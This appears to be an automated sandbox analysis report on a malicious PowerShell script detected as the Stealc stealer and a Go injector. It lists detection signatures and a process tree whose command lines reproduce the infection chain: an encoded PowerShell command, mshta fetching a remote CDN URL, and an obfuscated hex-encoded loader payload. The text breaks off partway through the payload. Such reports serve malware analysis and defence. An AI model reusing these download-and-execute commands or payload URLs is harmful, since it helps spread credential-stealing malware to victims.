Edit tour
Windows
Analysis Report
verification.b-cdn.net.ps1
Overview
General Information
Detection
Go Injector, Stealc
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Go Injector
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 7100 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\ver ification. b-cdn.net. ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7124 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4108 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -eC bQBzAG gAdABhACAA IgBoAHQAdA BwAHMAOgAv AC8AYgBpAG QAdgBlAHIA dABpAHMAZQ ByAC4AYgAt AGMAZABuAC 4AbgBlAHQA LwBzAG0AYQ ByAHQAMQAi AA== MD5: 04029E121A0CFA5991749937DD22A1D9) - mshta.exe (PID: 7172 cmdline:
"C:\Window s\system32 \mshta.exe " https:// bidvertise r.b-cdn.ne t/smart1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 7336 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction HbAH mnxA($ZzZo vm){return -split ($ ZzZovm -re place '..' , '0x$& ') };$PEcdKn = HbAHmnxA ('649390CF EBE1770BAA 5146DE7291 23CCD838E7 58E4276A36 3F637B3AAF 033337AC06 57955271E9 550F501406 601E1A4186 0E46E19B66 4FF95794FF 1F3D04636B D08F0C38C4 B63E80890B 016BD8AB0B 78879EF113 B89A3F38F6 F895DE87AE A8D3B7F0CC EB19C1832E 835097ECCB 2C36890967 C12BEB5604 76870CFCA3 B202677097 7E5BFC6237 BA383AB0C9 BC4FEE55E6 53DB382E41 C9866A6C02 22D784911F 31EBB65E37 30429D060F F2E1FCA15D 8F85018D75 055E5F3D7F 26332EE407 68EC9BAFDC 24FC0691D6 B57AB81120 A83FF02081 97B7794EB8 E48F081D52 65C2EDE5BE 7C897C05AB F2349EBA71 B3759948F6 CC4E3D2AA8 CB8B87BC3E F6DD53F55E 24B1A14B06 982580B23E 1CDC89A89E 5FC9AEBCC4 5162B160BD D6D1DD820E 751C213F64 2E6174AB94 0A544437CB D4B95F451F 49854521B6 B5F25DC295 8288B9E8AE 3E84EC687B F5FD542FD2 1B03B72875 5D38B9F795 538690A173 1AD87A4FF0 35E0E4DF4D 5D5926749B CC457636F0 4DB20D58FE F916462DCA C2915FF336 ECE4C61313 8832FB8CB5 3EC4DDA139 297818B533 54F21F92E9 A237CDEA5E BA27FD7E08 ABAD8BC364 C8AC9D4DA7 EF88987044 E30E52F804 D80E2DCF76 EB0C85804D 4469E0F07C 9E5CE26611 DE49AD0BB0 333D282354 BE10F94398 2430B1169A 615E79E3E0 C5EC79DA38 7AD53EAF2F D764DBB293 F0EF18D616 EEF99C3899 2715145D16 CA68D09F1D 913D460445 AD05E1641E E4AC2B1E94 4F7FF45B6C 7C51974DEC C8B09B1CCB DC8ED7174A 14C70F59EA 9B96E93E8A 336D668FF3 C2DC68D754 72553892C3 8D8F32E863 61D381E1EE 6E6E1BCA21 FA73FC43DD DAFCED2804 53E7B5D154 F59EF2BE21 3C2656F282 EABC6A8D2F 17A8B47C53 9E9817820B 02E234FD82 1466297478 CF4C06BF88 B97D45DCF3 E4C807DE23 7AD7614DCD 6332D4DE95 0C177646C5 0F08062E13 0279ECE8B0 8C9945A79E CF6C4B8802 4A24DC840A 12E22F404F 56B7C13E2F 9DC8AADEB4 9ECC7A67AE 9983475129 E57AFB8D0F 9326B22E9B 79AAA56DB3 EEC92EA970 8998095778 497441E15D 7795F50116 CF78185726 E9A7F7A3E4 0D436D50F7 7BDA8DDDBF D8CEBB4C75 8EA3595453 635FE911BA 9691EB0E2A 28529D8C4B 9E2D50DD40 CBDBC57F9D 07995096EB 6B48448429 C1F014B7BD F9146EC21A 79ADA827E6 590D159548 0216423543 33FC815469 6C9E79B4CD A3E5D22551 F1F2387AAA 9CE4464C57 1969727F84 5599B1BD31 2EB356A5E1 40EC6F9191 2B1227B9F3 A941727413 D53C0FE2B2 6DE40BB2B3 6462055BBF 7E8A6B8281 CC7FFD4048 A1CD97104C 3A63FF87CE 63106EF744 3D01D5FCE1 FD67A7E73E E2A8F2CD2E FED7B4A779 6DB2328BD3 17F0349F8B 606845CBF4 FC0F73D456 30EF346683 6C0A93133F 760481FB4E 2F4E46DBFF 6A7AA04559 89567090A3 EBB373F3EC 52B5EE0558 518BC12408 677670492B EA93021308 DF47CD62CF 99B8E47317 6B29652846 53204CE093 A6D8CE5630 0896793A61 754D407EB8 38A5637288 1C0664AF37 F1E9500BBA C243013C5F 5953ABE1CD 43347B87C2 D6ED6169C7 B0D8242DE3 ED14C3F856 F471A13CEF E0993EE315 D5305CC2AC 9054976C9C